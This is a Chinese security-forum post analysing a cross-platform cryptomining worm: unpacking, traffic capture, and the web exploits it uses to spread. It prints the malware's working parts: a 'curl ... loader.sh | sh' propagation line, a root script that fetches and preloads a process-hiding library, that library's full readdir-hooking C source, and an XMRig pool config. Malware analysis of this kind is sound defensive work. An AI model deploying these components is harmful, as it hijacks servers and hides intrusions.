-
-
[原创]关于双系统挖矿,新型AutoUpdate挖矿病毒的分析与讨论
-
发表于: 2021-7-12 20:23
-
参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
上周末看到了深信服千里目的病毒分析报告,顿时眼睛一亮,这种集合了Windows&&Linux&&Web流量攻击的恶意程序既考察了分析人员的知识广度,又给目前安全形势带来了严峻的考验。同时也让我觉得其实二进制与web之间的关系又近了一步。全栈并不是那么遥不可及!
upx脱壳后,发现go样本,找到main函数,定位到网络连接
域名+请求文件全都明文存储在文件中
放样本跑起来,查看输出(该程序大概功能会检查恶意程序的相关模块,根据系统信息下载对应缺失模块)
请求文件,可以看到病毒作者很人性化,还为我们专门定制了双平台的攻击模块http://m.windowsupdatesupport.org/d/windowsupdatev1.json
我们以main函数中的网络请求之前下断,由此入手调试
地址下断b *0x6681ef,查看后续行为
不错!崩溃了(舰长,很有精神!),每次调试gdb都会崩溃。不浪费时间,换一种调试思路。(补充:下回试试 ltrace和strace)
tcpdump抓包,通过分析流量把该程序后续行为补全,导出http对象
好家伙都给老子下全了,剩下的我们逐个分析
(嚯,好家伙,ubuntu上给我下个pe,nbnb!!你是不是还得给我装个wine?)
二话不多说,火绒剑&&procmon,对症下药
(哟!这程序莫不是被我吓坏了?在我淫威之下屈服了?那老子就看看,不进去)
拖入ida,提示我们缺失dll库(问号脸?_?)
找到动态调用该模块的地方
根据以往经验,大概率挖矿程序都是魔改或梭哈的github开源项目,执行使用strings把字符串全dump出来,找到如下配置文件
再从github上搜一搜,终于让我找到了宁的前身
https://github.com/xmrig/xmrig
作者为了防止被认出,还专门把相关指纹替换了一遍(不错,真tm用心良苦)
实际上,xmmrig.com这个域名根本不存在!
该程序会帮宁安装挖矿所缺失的一切组件,真tm替客户着想!!!
dbus程序前身为github上xmrig挖矿的开源项目
下载processhider.c模块,编译并替换掉/usr/local/lib/libc2.28.so,并添加到/etc/ld.so.preload中,由此再运行的程序都会优先加载preload中的模块
将上述进程 kworkers | dbus | autoupdate 过滤掉,从而达到隐藏进程的目的
(好家伙,上来就先把同行们和挖矿进程都干掉。。。果然搞tm病毒也内卷,赶快收集一波,以后应急先把这脚本跑一遍)
查询出口ip,查询本地ssh私钥和pem证书文件,最后通过查询knownhost查看连接过的主机
最后通过收集到的私钥连接其他机器使其下载loader.sh进行蠕虫式传播,自此也成就闭环
具备横传能力,危险系数高
(声明,本人对web洞及java研究不深,如有错误,欢迎探讨)
首先upx脱壳,好家伙,又一个go程序,查看导出表(找到了大宝藏)
这些main类中的扫描模块,我们一个一个看(当然,攻击模块还有很多,我就不献丑了)
xxljob (弱密码登后台?)
这个无法确定是哪个洞,一开始我以为是XXL-JOB executor未授权。。但始终没找到相关json串
mongo-express远程代码执行漏洞(CVE-2019-10758)
相关链接:https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
shiro反序列化(cve-2016-4437)
相关链接:https://vulhub.org/#/environments/shiro/CVE-2016-4437/
tomcat密码爆破
(这个以前玩过,哈哈哈)
seeyon(致远OA远程代码执行漏洞)
相关链接:https://mrxn.net/news/620.html
seeyon(致远OA任意文件上传)
相关链接:https://www.cnblogs.com/sketchpl4ne/p/14515113.html
泛微oa(远程代码执行)
相关链接:https://blog.csdn.net/qq_41757280/article/details/101198845
用友oa(远程命令执行)
相关链接:https://blog.csdn.net/m0_58434634/article/details/117547164
docker daemon api 未授权访问
相关链接:
https://vulhub.org/#/environments/docker/unauthorized-rce/
structs2(包括S008\S013\S015\S016\S045\S046\S057)
jenkin插件远程代码执行(不确定)
weblogic console接口远程代码执行漏洞
fastjson 1.2.47远程命令执行
找到main.DownLoadFile函数,交叉引用
下载dubbo.jar模块
下载dubbo.jar对应的攻击参数
可以看到dubbo.jar配置文件中执行的命令为
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh横向传播,即通过已知的web漏洞进行横向传播
反编译该程序发现包括快速检测和exp(攻击模块)
执行的参数如上
至此,病毒就分析到这里了,这个样本覆盖的知识面相当全面,拿来练手再合适不过。最近两年针对企业端服务器的各种木马越来越多,二进制与web之间的鸿沟也越来越近,希望各位安全员们以此为戒,全面发展才是未来的出路
参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
#题外话
最近在找工作,希望以此抛砖引玉,找到份自己心怡的工作,工作地点(北京、天津)感谢!!
web新手,文章若分析有误欢迎共同探讨
{ "linux": [{
"filename": "download",
"handle": "download",
"url": "/download",
"ver": "20210002"
},{
"filename": "dbus",
"handle": "downrun",
"url": "/dbus",
"ver": "20210002"
},{
"filename": "hideproc.sh",
"handle": "downrun",
"url": "/hideproc.sh",
"ver": "20210002"
},{
"filename": "sshkey.sh",
"handle": "downrun",
"url": "/sshkey.sh",
"ver": "20210002"
},{
"filename": "autoupdate",
"handle": "downrun",
"url": "/autoupdate",
"ver": "20210012"
},{
"filename": "kworkers",
"handle": "update",
"url": "/kworkers",
"ver": "20210008"
}
],
"windows": [{
"filename": "service.exe",
"handle": "update",
"url": "/service.exe",
"ver": "20210008"
},{
"filename": "inj.exe",
"handle": "download",
"url": "/inj.exe",
"ver": "20210003"
},{
"filename": "runtime.dll",
"handle": "download",
"url": "/runtime.dll",
"ver": "20210003"
},{
"filename": "autoupdate.exe",
"handle": "downrun",
"url": "/autoupdate.exe",
"ver": "20210012"
},{
"filename": "updater.exe",
"handle": "downrun",
"url": "/updater.exe",
"ver": "20210003"
}]
}{ "linux": [{
"filename": "download",
"handle": "download",
"url": "/download",
"ver": "20210002"
},{
"filename": "dbus",
"handle": "downrun",
"url": "/dbus",
"ver": "20210002"
},{
"filename": "hideproc.sh",
"handle": "downrun",
"url": "/hideproc.sh",
"ver": "20210002"
},{
"filename": "sshkey.sh",
"handle": "downrun",
"url": "/sshkey.sh",
"ver": "20210002"
},{
"filename": "autoupdate",
"handle": "downrun",
"url": "/autoupdate",
"ver": "20210012"
},{
"filename": "kworkers",
"handle": "update",
"url": "/kworkers",
"ver": "20210008"
}
],
"windows": [{
"filename": "service.exe",
"handle": "update",
"url": "/service.exe",
"ver": "20210008"
},{
"filename": "inj.exe",
"handle": "download",
"url": "/inj.exe",
"ver": "20210003"
},{
"filename": "runtime.dll",
"handle": "download",
"url": "/runtime.dll",
"ver": "20210003"
},{
"filename": "autoupdate.exe",
"handle": "downrun",
"url": "/autoupdate.exe",
"ver": "20210012"
},{
"filename": "updater.exe",
"handle": "downrun",
"url": "/updater.exe",
"ver": "20210003"
}]
}"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": true,
"host": "127.0.0.1",
"port": 61254,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"cpu-affinity":3,
"threads":3,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"max-threads-hint": 50,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"cn/0": false,
"cn-lite/0": false
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn/0": false,
"cn-lite/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn/0": false,
"cn-lite/0": false
},
"donate-level": 0,
"donate-over-proxy":0 ,
"log-file": null,
"pools": [
{
"algo": null,
"coin": null,
"url": "m.windowsupdatesupport.org:443",
"user": "x",
"pass": "x",
"rig-id": null,
"nicehash": true,
"keepalive": false,
"enabled": true,
"tls": true,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"retries": 5,
"retry-pause": 5,
"syslog": false,
"tls": {
"enabled": true,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": true,
"host": "127.0.0.1",
"port": 61254,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"cpu-affinity":3,
"threads":3,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"max-threads-hint": 50,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"cn/0": false,
"cn-lite/0": false
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn/0": false,
"cn-lite/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn/0": false,
"cn-lite/0": false
},
"donate-level": 0,
"donate-over-proxy":0 ,
"log-file": null,
"pools": [
{
"algo": null,
"coin": null,
"url": "m.windowsupdatesupport.org:443",
"user": "x",
"pass": "x",
"rig-id": null,
"nicehash": true,
"keepalive": false,
"enabled": true,
"tls": true,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"retries": 5,
"retry-pause": 5,
"syslog": false,
"tls": {
"enabled": true,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
if [ "$EUID" -ne 0 ]
then echo "Please run as root"
else if [ `grep libc2.28 /etc/ld.so.preload` ]
then echo "hideproc already done!!"
else
apt-get update -y
apt-get install build-essential -y
yum check-update
yum install build-essential -y
dnf groupinstall "Development Tools" -y
yum group install "Development Tools" -y
curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
mv libc2.28.so /usr/local/lib/ -f
grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
rm -f processhider.c
ls >/tmp/.1 2>&1
grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload
fi
fiif [ "$EUID" -ne 0 ]
then echo "Please run as root"
else if [ `grep libc2.28 /etc/ld.so.preload` ]
then echo "hideproc already done!!"
else
apt-get update -y
apt-get install build-essential -y
yum check-update
yum install build-essential -y
dnf groupinstall "Development Tools" -y
yum group install "Development Tools" -y
curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
mv libc2.28.so /usr/local/lib/ -f
grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
rm -f processhider.c
ls >/tmp/.1 2>&1
grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload
fi
fi#define _GNU_SOURCE#include <stdio.h>#include <dlfcn.h>#include <dirent.h>#include <string.h>#include <unistd.h>/*
* Every process with this name will be excluded
*/
static const char* process_to_filter = "kworkers|dbus|autoupdate";
/*
* Get a directory name given a DIR* handle
*/
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{ int fd = dirfd(dirp);
if(fd == -1) {
return 0;
}
char tmp[64];
snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
ssize_t ret = readlink(tmp, buf, size);
if(ret == -1) {
return 0;
}
buf[ret] = 0;
return 1;
}/*
* Get a process name given its pid
*/
static int get_process_name(char* pid, char* buf)
{ if(strspn(pid, "0123456789") != strlen(pid)) {
return 0;
}
char tmp[256];
snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
FILE* f = fopen(tmp, "r");
if(f == NULL) {
return 0;
}
if(fgets(tmp, sizeof(tmp), f) == NULL) {
fclose(f);
return 0;
}
fclose(f);
int unused;
sscanf(tmp, "%d (%[^)]s", &unused, buf);
return 1;
}#define DECLARE_READDIR(dirent, readdir) \static struct dirent* (*original_##readdir)(DIR*) = NULL; \
\
struct dirent* readdir(DIR *dirp) \
{ \ if(original_##readdir == NULL) { \
original_##readdir = dlsym(RTLD_NEXT, #readdir); \
if(original_##readdir == NULL) \
{ \
fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
} \
} \
\
struct dirent* dir; \
\
while(1) \
{ \
dir = original_##readdir(dirp); \
if(dir) { \
char dir_name[256]; \
char process_name[256]; \
if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name, "/proc") == 0 && \
get_process_name(dir->d_name, process_name) && \
strstr( process_to_filter,process_name)) { \
continue; \
} \
} \
break; \
} \
return dir; \
}DECLARE_READDIR(dirent64, readdir64);DECLARE_READDIR(dirent, readdir);#define _GNU_SOURCE#include <stdio.h>#include <dlfcn.h>#include <dirent.h>#include <string.h>#include <unistd.h>/*
* Every process with this name will be excluded
*/
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
|
|
|
|
